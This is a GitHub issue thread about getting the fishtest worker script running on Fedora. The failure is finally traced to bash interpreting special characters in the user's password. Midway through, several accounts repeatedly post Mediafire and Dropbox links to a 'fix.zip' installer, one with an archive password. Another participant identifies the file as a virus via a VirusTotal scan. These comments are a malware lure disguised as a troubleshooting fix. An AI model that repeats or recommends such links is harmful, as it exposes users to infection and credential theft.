### ISSUE TITLE
Not working on fedora linux

### ISSUE THREAD

**Issue by CounterFlow64** [official-stockfish/fishtest#2133]
I installed the equivelence of build essential, and followed the rhel/centOS steps. This is the error I get. 

![image](https://github.com/user-attachments/assets/ae4401ed-16ac-4c3b-a84c-6815637eca00)

**Comment by vondele** [comment]
The script you are executing is not a python script, but a bash script try something like
`bash fishtest/worker/launch_worker.sh user pwd ....`

**Comment by CounterFlow64** [comment]
Seems one step further, but now a different error

![image](https://github.com/user-attachments/assets/2b0af6ec-26a9-4c45-848c-0160c66014ed)

**Comment by vondele** [comment]
that would look like some stray characters in that script file?
Can you
`cat fishtest/worker/launch_worker.sh`
and see if there is some line starting with `!nw` ? 
Post a screenshot from the output of the `cat` above if there isn't anything you can spot.

**Comment by CounterFlow64** [comment]
```
#!/bin/bash
# usage: fishtest.sh  [<n_cores> <username> <password>]
# <n_cores>: number of cores to be used in fishtest. Suggested max value = n. physical cores-1
# <username>: username on fishtest (to be enclosed in quote if contains special character)
# <password>: password on fishtest (to be enclosed in quote if contains special character)
# The three parameters are mandatory only for the first execution

if [ $# -gt 0 ]; then
  sudo -i -u fishtest << EOF
source scl_source enable devtoolset-7
python3 fishtest-master/worker/worker.py --concurrency $1 "$2" "$3"
EOF
else
  sudo -i -u fishtest << EOF
source scl_source enable devtoolset-7
python3 fishtest-master/worker/worker.py
EOF
fi

```

**Comment by vondele** [comment]
I can't see anything obviously wrong.

**Comment by MinetaS** [comment]
1. Do you have exclamation mark in your password?
2. Can you run `source scl_source enable devtoolset-7` in bash without errors?

**Comment by CounterFlow64** [comment]
No, there isn't a exclamation mark in the password

I get a no such directory error with the mentioned command

**Comment by MinetaS** [comment]
> I get a no such directory error with the mentioned command

In that case it seems you haven't installed Developer Toolset.

Note that the wiki looks extremely outdated (devtoolkit-7? C++11?) and also missing several steps (setting up fishtest user). Instead, try following steps:

1. Install gcc/g++
```sh
sudo dnf install gcc gcc-c++
```

2. Check if g++ is installed properly.
```sh
g++ --version
```

3. If it's installed, you don't need any extra script, just run worker python script.
```
python3 worker.py [username] [password] --concurrency [cpus]
```

**Comment by CounterFlow64** [comment]
Tried that now, but I still get this error:
`
bash: !nw: event not found`

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by xu-shawn** [comment]
Computer virus?

**Comment by CounterFlow64** [comment]
That link this user sent is reported as suspicious by media fire... could this be a bot?

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by xu-shawn** [comment]
https://www.virustotal.com/gui/file/799b27cba62b236ac145572ae493c8c222871aa62f540a2c54a303a896ee6328?nocache=1

**Comment by xu-shawn** [comment]
This is a virus

**Comment by CounterFlow64** [comment]
Report this user

**Comment by xu-shawn** [comment]
I did, somehow they are still not banned yet

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinetaS** [comment]
> Tried that now, but I still get this error:
> ` bash: !nw: event not found`

After running worker.py? I think something is misconfigured in your bash environment.

**Comment by CounterFlow64** [comment]
Got it to work now, turns out my password had multiple special characters, and bash reacted to them. I think this should be clarified in the docs, but good to see it work now, I can help improve StockFish
